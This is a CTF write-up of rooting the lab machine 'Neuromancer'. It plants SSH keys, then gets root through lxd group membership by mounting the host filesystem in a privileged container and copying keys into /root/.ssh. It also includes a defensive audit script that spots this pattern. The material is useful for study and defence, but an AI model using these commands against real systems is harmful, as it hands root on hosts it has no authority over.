Enter file in which to save the key (/home/ta/.ssh/id_rsa):
Enter passphrase (empty for no passphrase): 123456
Enter same passphrase again: 123456
Your identification has been saved in /home/ta/.ssh/id_rsa.
Your public key has been saved in /home/ta/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:/gzcDUYz+IUYLOPtla+IXjSlx8Mmfc9cHvH0794Ptys ta@neuromancer
The key's randomart image is:
+---[RSA 2048]----+
| .. |
| o .+ . |
| . +o *.. ..|
| . .Oo+ .+|
| .S.@.. .+|
| +.B =.+ oo|
| .=.... = +|
| ...+. E +o|
| .. o .+B|
+----[SHA256]-----+
$ ls -la
total 16
drwxr-x--- 2 ta ta 4096 Jan 18 21:00 .
drwxr-xr-x 7 ta ta 4096 Jan 18 20:57 ..
-rw------- 1 ta ta 1766 Jan 18 21:00 id_rsa
-rw-r----- 1 ta ta 396 Jan 18 21:00 id_rsa.pub
$ cp id_rsa.pub authorized_keys
$ ls
authorized_keys
id_rsa
id_rsa.pub
$ chmod 400 *
$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpcLl+QjOHvGDqQ9ZPsgT8Rm9VbuZsa0JtUsE59C5feBNUC0uuOME6JSSY+Ci5fXnanOJIFKcNbRnfz0eQ35/FlCQE6TqXW08LROeaz+scppXs9O7wMNkmVrtrjHMIfebEtB9I05DWPpme5GjHE9QerNjE4t8Z6khoqipeQAy2VqYmqU5u8ll2gm3VDNhgUnfGeBwUoQA2Ktj1F9XMaBVgRBytZ86VLW1Be4SLd6rkMhgA/poZQSZGjU1di09Y9VnN/au+PgQQvVvldP2WITAfS4j0rTTF9zz8o+kccWll/CkMjoOBAJB06KBqxg1dnGcMXyEUnTshFidXx2TjBQQx ta@neuromancer
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpcLl+QjOHvGDqQ9ZPsgT8Rm9VbuZsa0JtUsE59C5feBNUC0uuOME6JSSY+Ci5fXnanOJIFKcNbRnfz0eQ35/FlCQE6TqXW08LROeaz+scppXs9O7wMNkmVrtrjHMIfebEtB9I05DWPpme5GjHE9QerNjE4t8Z6khoqipeQAy2VqYmqU5u8ll2gm3VDNhgUnfGeBwUoQA2Ktj1F9XMaBVgRBytZ86VLW1Be4SLd6rkMhgA/poZQSZGjU1di09Y9VnN/au+PgQQvVvldP2WITAfS4j0rTTF9zz8o+kccWll/CkMjoOBAJB06KBqxg1dnGcMXyEUnTshFidXx2TjBQQx ta@neuromancer
$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0A0CA4D74B1C05FCDEC9F8FAE18EFB6D
[encrypted private key body omitted]
-----END RSA PRIVATE KEY-----

On the Kali side, run:

root@kali:~# cd .ssh
root@kali:~/.ssh# ls
known_hosts
root@kali:~/.ssh# touch id_rsa
root@kali:~/.ssh# nano id_rsa (paste in the contents of id_rsa from the ta user)
root@kali:~/.ssh# chmod 400 *

SSH in, entering the passphrase 123456:
root@kali:~# ssh -i /root/.ssh/id_rsa -p 34483 ta@192.168.56.110
----------------------------------------------------------------
| Neuromancer Secure Remote Access |
| UNAUTHORIZED ACCESS will be investigated by the Turing Police |
----------------------------------------------------------------
Enter passphrase for key '/root/.ssh/id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

94 packages can be updated.
44 updates are security updates.


Last login: Tue Jul 3 21:53:25 2018
ta@neuromancer:~$ id
uid=1000(ta) gid=1000(ta) groups=1000(ta),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
ta@neuromancer:~$ whoami
ta

it works!!!!!!

Running the "groups" command again, the penny drops... "ta" is not a member of the "admin" group, so this is not an instant path to root:
ta@neuromancer:~$ groups
ta adm cdrom dip plugdev lxd lpadmin sambashare

Moving on... there is no real point now in jumping to the socat option for getting a TTY...

When trying to get root, I usually work through the following, in order:

  • sudo
  • password
  • file permissions (suid/guid)
  • cron jobs (usually combined with bad file permissions)
  • kernel exploits
  • running applications
  • file system

Generally, the further down that list you go, the harder the privesc. So... having exhausted the first two options, some old-fashioned enumeration is required.
After a round of privesc enumeration, I found the exploit used in the first privesc route, 44298.c... but... there is always a "but"! :-)

Step 4: choosing the privesc route

There are many excellent writeups available for this machine, and without exception they all take the kernel exploit option, quite rightly, because it is the most obvious choice. If you need to root a box quickly in an exam scenario, you would of course take the most obvious route.

Apart from having to compile the exploit on the attack box (Neuromancer does not have gcc installed), it is a very quick and easy option. But setting aside anything CTF/OSCP related... what about the "real world", where you may be dealing with a mission-critical production system? A kernel exploit can take a production box down, and you really do not want to jeopardise the next stage of the engagement!

However, there is another way to root this box, and I cannot help feeling that "acrobat" (the machine author) may have intended it as another option to be discovered. Although it may attract the blue team's attention, it is unlikely to cause a kernel panic. So what am I talking about? The clue is in the following simple command to check which groups "ta" belongs to:
ta@neuromancer:~$ groups
ta adm cdrom dip plugdev lxd lpadmin sambashare

Note the reference to lxd, Ubuntu's container technology and an alternative to Docker. I did some research and found a great article by "Booj" called Privilege Escalation via lxd. According to that article, if lxd is installed and a given user is a member of the lxd group, they effectively have the same privileges as if the following had been added to /etc/sudoers:

admin ALL=NOPASSWD: ALL

So... let us get busy with this option.

Step 5: preparing and using the container - overview

I will not go into every small detail of creating an Ubuntu-based LXC container. That will be the subject of another article, since it is a fascinating topic that deserves a deep dive and is outside the scope of this one.

In short, the work involved the following:

  • Based on the information gathered, set up a VM as close to Neuromancer as possible, i.e. Ubuntu 16.04.
  • Install lxd on the newly created VM.
  • Create a container, again based on Ubuntu 16.04. I just wanted to keep things simple, as my best guess of what I should do.
  • Export that container as a tarball and transfer it to my attack box, and from there to the Neuromancer box. Thanks to the SOCAT port forwarding set up earlier, the transfer can be done over scp.

To be clear... at no point did I cheat by putting the attack box on the same physical subnet as Neuromancer. All of this had to be done the "hard" way. How else would I learn?

  • Import the lxd container image tarball and enable it to mount the host file system (yes, Neuromancer!)
  • Get a root shell session on the newly created container and create a set of SSH keys, to be written to /root/.ssh on Neuromancer (via /mnt/root/root/.ssh in the container), and add the public key to /root/.ssh/authorized_keys on the Neuromancer host (again via /mnt/root/root/.ssh in the container)
  • Transfer a copy of the SSH keys to my attack Kali and log in as root (hopefully).

The above is ambitious, but worth it, especially if the only alternative is a risky kernel exploit. For brevity, I will pick up at the point where the container tarball has just been transferred to the Neuromancer host. Buckle up and enjoy the ride! :-)

Step 6 - importing the container image.

First check the target's kernel and architecture; the image is then built on the Kali attack machine.
ta@neuromancer:~$ uname -a
Linux neuromancer 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
ta@neuromancer:~$ cat /proc/version
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

It is 64-bit Linux.
root@kali:~# git clone https://github.com/saghul/lxd-alpine-builder
正克隆到 'lxd-alpine-builder'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
展开对象中: 100% (27/27), 完成.
root@kali:~# cd lxd-alpine-builder/
root@kali:~/lxd-alpine-builder# ls
build-alpine LICENSE README.md
root@kali:~/lxd-alpine-builder# chmod 777 *
root@kali:~/lxd-alpine-builder# ls
build-alpine LICENSE README.md
root@kali:~/lxd-alpine-builder# proxychains ./build-alpine -a x86_64
ProxyChains-3.1 (http://proxychains.sf.net)
Determining the latest release... |DNS-request| dl-cdn.alpinelinux.org
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
v3.11
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.11/main/x86_64
|DNS-request| dl-cdn.alpinelinux.org
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
Downloading alpine-mirrors-3.5.10-r0.apk
|DNS-request| dl-cdn.alpinelinux.org
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading alpine-keys-2.1-r2.apk
|DNS-request| dl-cdn.alpinelinux.org
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading apk-tools-static-2.10.4-r3.apk
|DNS-request| dl-cdn.alpinelinux.org
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: 成功
Verified OK
Selecting mirror http://dl-8.alpinelinux.org/alpine/v3.11/main
fetch http://dl-8.alpinelinux.org/alpine/v3.11/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r0)
(2/19) Installing busybox (1.31.1-r9)
Executing busybox-1.31.1-r9.post-install
(3/19) Installing alpine-baselayout (3.2.0-r3)
Executing alpine-baselayout-3.2.0-r3.pre-install
Executing alpine-baselayout-3.2.0-r3.post-install
(4/19) Installing openrc (0.42.1-r2)
Executing openrc-0.42.1-r2.post-install
(5/19) Installing alpine-conf (3.8.3-r4)
(6/19) Installing libcrypto1.1 (1.1.1d-r3)
(7/19) Installing libssl1.1 (1.1.1d-r3)
(8/19) Installing ca-certificates-cacert (20191127-r0)
(9/19) Installing libtls-standalone (2.9.1-r0)
(10/19) Installing ssl_client (1.31.1-r9)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.4-r3)
(13/19) Installing busybox-suid (1.31.1-r9)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.4-r0)
(16/19) Installing musl-utils (1.1.24-r0)
(17/19) Installing libc-utils (0.7.2-r0)
(18/19) Installing alpine-keys (2.1-r2)
(19/19) Installing alpine-base (3.11.3-r0)
Executing busybox-1.31.1-r9.trigger
OK: 8 MiB in 19 packages
root@kali:~/lxd-alpine-builder# ls
alpine-v3.11-x86_64-20200119_0151.tar.gz build-alpine LICENSE README.md

Transfer alpine-v3.11-x86_64-20200119_0151.tar.gz to the target:
ta@neuromancer:/tmp$ scp root@192.168.56.102:/root/lxd-alpine-builder/alpine-v3.11-x86_64-20200119_0151.tar.gz /tmp/
root@192.168.56.102's password:
alpine-v3.11-x86_64-20200119_0151.tar.gz 100% 3151KB 3.1MB/s 00:00
ta@neuromancer:/tmp$ ls
alpine-v3.11-x86_64-20200119_0151.tar.gz
f
hsperfdata_ta
systemd-private-14b0eedfa06043179575f7374dc44c6a-systemd-timesyncd.service-EqRj97

To import the container image, use the following command. The "alias" is a convenient way of referring to the container image instead of the long file name (in lxc terms it is actually the "fingerprint"):
ta@neuromancer:/tmp$ lxc image import alpine-v3.11-x86_64-20200119_0151.tar.gz --alias haxor
Image imported with fingerprint: 468c747448ec99c6b76e5a943df89a21489eb5d605ebe5d4c341a78ec217a223
ta@neuromancer:/tmp$ lxc image list
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| haxor | 468c747448ec | no | alpine v3.11 (20200119_01:51) | x86_64 | 3.08MB | Jan 19, 2020 at 8:16am (UTC) |
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Next, you must create an actual container based on the imported image:
ta@neuromancer:/tmp$ lxc init haxor -c security.privileged=true
Creating the container
Container name is: right-whippet
ta@neuromancer:/tmp$ lxc list
+---------------+---------+------+------+------------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------------+---------+------+------+------------+-----------+
| right-whippet | STOPPED | | | PERSISTENT | 0 |
+---------------+---------+------+------+------------+-----------+

Note that the container name was assigned automatically; I did not specify it. Nice sense of humour from the Ubuntu lxc developers. Although Booj's article contains all the details you need, the -c switch is what effectively gives you the Yoda-like powers over the entire host file system. Next, the disk mount options for the new container ("right-whippet") need to be specified:
ta@neuromancer:/tmp$ lxc config device add right-whippet whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to right-whippet

As you can see, this mounts the root / of the host file system (Neuromancer) as a device named "whatever" at /mnt/root. The container can now be started and a shell session entered with the following commands.

Start the container:
ta@neuromancer:/tmp$ lxc start right-whippet
ta@neuromancer:/tmp$ lxc list
+---------------+---------+------+------+------------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------------+---------+------+------+------------+-----------+
| right-whippet | RUNNING | | | PERSISTENT | 0 |
+---------------+---------+------+------+------------+-----------+

Exec a shell in the container; it runs as root:
ta@neuromancer:/tmp$ lxc exec right-whippet --mode=interactive /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root
~ # ls
~ # pwd
/root

Step 7 - proving root access to the Neuromancer file system

Change into the container's /mnt/root directory:
~ # cd /mnt/root
/mnt/root # ls
bin etc lib media proc sbin sys var
boot home lib64 mnt root snap tmp vmlinuz
dev initrd.img lost+found opt run srv usr

You are actually looking at the root of the host (Neuromancer) file system. You can now simply cd into "root" and see the all-important "flag.txt":
/mnt/root # cd root
/mnt/root/root # ls
flag.txt struts2 velocity.log
/mnt/root/root # cat flag.txt
be3306f431dae5ebc93eebb291f4914a

But we are not done yet. For the plan to work, we need to be able to write into root's home (i.e. /mnt/root/root):
/mnt/root/root # echo fuck-all-you-shit > fuck.txt
/mnt/root/root # cat fuck.txt
fuck-all-you-shit

Yes, it works! So... now all that is needed is a root shell.

Step 8: SSH key generation

With write access in hand, a set of SSH keys needs to be generated. Still inside the container shell session (right-whippet), the process involves:

  • Run ssh-keygen. Choose whatever options you like, but make sure the files are saved to /mnt/root/root/.ssh
  • Create an authorized_keys file: touch /mnt/root/root/.ssh/authorized_keys
  • Append the contents of the newly created public key to the authorized_keys file: cat /mnt/root/root/.ssh/id_rsa.pub >> authorized_keys

Instead, I copied the files from the earlier /home/ta/.ssh directory into /mnt/root/root/.ssh/:
/mnt/root/root/.ssh # cp /mnt/root/home/ta/.ssh/authorized_keys authorized_keys
/mnt/root/root/.ssh # ls
authorized_keys known_hosts
/mnt/root/root/.ssh # cp /mnt/root/home/ta/.ssh/id_rsa id_rsa
/mnt/root/root/.ssh # cp /mnt/root/home/ta/.ssh/id_rsa.pub id_rsa.pub

The contents of /mnt/root/root/.ssh should now look like this:
/mnt/root/root/.ssh # ls
authorized_keys id_rsa id_rsa.pub known_hosts

Step 9: copying the keys to the attack machine

Since the files from the earlier /home/ta/.ssh/ directory were reused, connecting is simply a matter of:
root@kali:~# ssh -i /root/.ssh/id_rsa -p 34483 root@192.168.56.110
----------------------------------------------------------------
| Neuromancer Secure Remote Access |
| UNAUTHORIZED ACCESS will be investigated by the Turing Police |
----------------------------------------------------------------
Enter passphrase for key '/root/.ssh/id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

94 packages can be updated.
44 updates are security updates.


Last login: Tue Jul 3 22:02:40 2018
root@neuromancer:~# id
uid=0(root) gid=0(root) groups=0(root)
root@neuromancer:~# whoami
root
root@neuromancer:~#

Connected successfully; the passphrase is still 123456, the same one used for ta.

The easiest way to do this from the "right-whippet" sh session is to display the contents of id_rsa and id_rsa.pub on screen and copy/paste them into your favourite text editor. Make sure to change the file permissions with chmod 400, otherwise the keys will be ignored when you try to use them (I wasted some time wondering why the keys did not work until I did this).

All I want to say now is: can one be too cool for one's own good... :)))):::)))::))
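Two checks a host audit would run in response to what the last two privesc steps showed, as an added example that is not from the original writeup: non-root members of the lxd (or docker) group, and SSH keys that appear in more than one account's authorized_keys (here, ta's key turning up in root's). Inputs are constructed /etc/group and authorized_keys text with placeholder key blobs; the group list is an assumption of this example.

```python
"""Two host checks suggested by the lxd route and the authorized_keys step above.

Added example, not part of the original writeup. SAMPLE_GROUP and SAMPLE_KEYS
are constructed in the formats of /etc/group and ~/.ssh/authorized_keys; the
group list and the "shared key" notion are this example's own assumptions.
"""
from typing import Dict, List, Tuple

# Membership here is root-equivalent: a privileged container with the host root
# mounted (lxd, as shown above) or access to the docker socket gives the same result.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker"}
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """name -> members, from /etc/group style lines (name:x:gid:m1,m2)."""
    groups = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or line.startswith("#"):
            continue
        groups[parts[0]] = [m for m in parts[3].split(",") if m]
    return groups


def root_equivalent_members(group_text: str) -> List[Tuple[str, str]]:
    """(group, user) pairs for non-root users in root-equivalent groups."""
    found = []
    for name, members in parse_group_file(group_text).items():
        if name in ROOT_EQUIVALENT_GROUPS:
            found.extend((name, m) for m in members if m != "root")
    return sorted(found)


def parse_authorized_keys(text: str) -> List[Tuple[str, str]]:
    """(key_blob, comment) per key line; leading options (from=..., command=...) are skipped."""
    keys = []
    for line in text.splitlines():
        toks = line.split()
        if not toks or toks[0].startswith("#"):
            continue
        for i, tok in enumerate(toks):
            if tok.startswith(KEY_TYPE_PREFIXES) and i + 1 < len(toks):
                keys.append((toks[i + 1], " ".join(toks[i + 2:])))
                break
    return keys


def shared_keys(per_user: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Key blobs present in more than one account's authorized_keys, with the
    accounts sharing them; root sharing a key with a low-privilege user is the
    pattern the writeup produces by copying ta's keys into /root/.ssh."""
    owners: Dict[str, set] = {}
    for user, text in per_user.items():
        for blob, _comment in parse_authorized_keys(text):
            owners.setdefault(blob, set()).add(user)
    return sorted((blob, sorted(users)) for blob, users in owners.items() if len(users) > 1)


# Constructed samples (key blobs are placeholders, not real keys).
SAMPLE_GROUP = """root:x:0:
adm:x:4:syslog,ta
lxd:x:110:ta
lady3jane:x:1001:
"""
SAMPLE_KEYS = {
    "ta": "ssh-rsa AAAAB3NzaC1yc2E_PLACEHOLDER_TA ta@neuromancer\n",
    "root": ("# admin access\n"
             "from=\"10.0.0.5\" ssh-ed25519 AAAAC3NzaC1lZDI1_PLACEHOLDER_ADMIN admin@bastion\n"
             "ssh-rsa AAAAB3NzaC1yc2E_PLACEHOLDER_TA ta@neuromancer\n"),
    "lady3jane": "",
}

if __name__ == "__main__":
    print("root-equivalent group members:", root_equivalent_members(SAMPLE_GROUP))
    print("keys shared across accounts:", shared_keys(SAMPLE_KEYS))
```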

Privilege escalation 2 summary

All in all, Neuromancer is a very interesting machine. To get there you have to root another box (Straylight) first and then learn how to use socat properly for port forwarding. Once you have a low-privilege shell on Neuromancer, the privesc is fairly simple... at least via the kernel exploit route. It was nice, however, to discover the lxd privesc clue hidden in the scope.

I had only dabbled with containers (Docker) before, doing some experimental work on certain vulnerabilities, but had never actually used a container configuration issue to get root on a host. I searched around to see whether other articles covered this angle, but so far I have not found any. So... it is good to do something new that others may find useful.

Neuromancer key takeaways:

  • interactive TTY shell
  • SSH key poisoning
  • lxd container privilege escalation (new)
  • file transfer with scp
  • password leak in tomcat-users.xml

Game over

Sorry, once again I could not find the one-click walkthrough script by a certain Greek expert. I am so sorry about this... It's a pity...

The end, to be continued...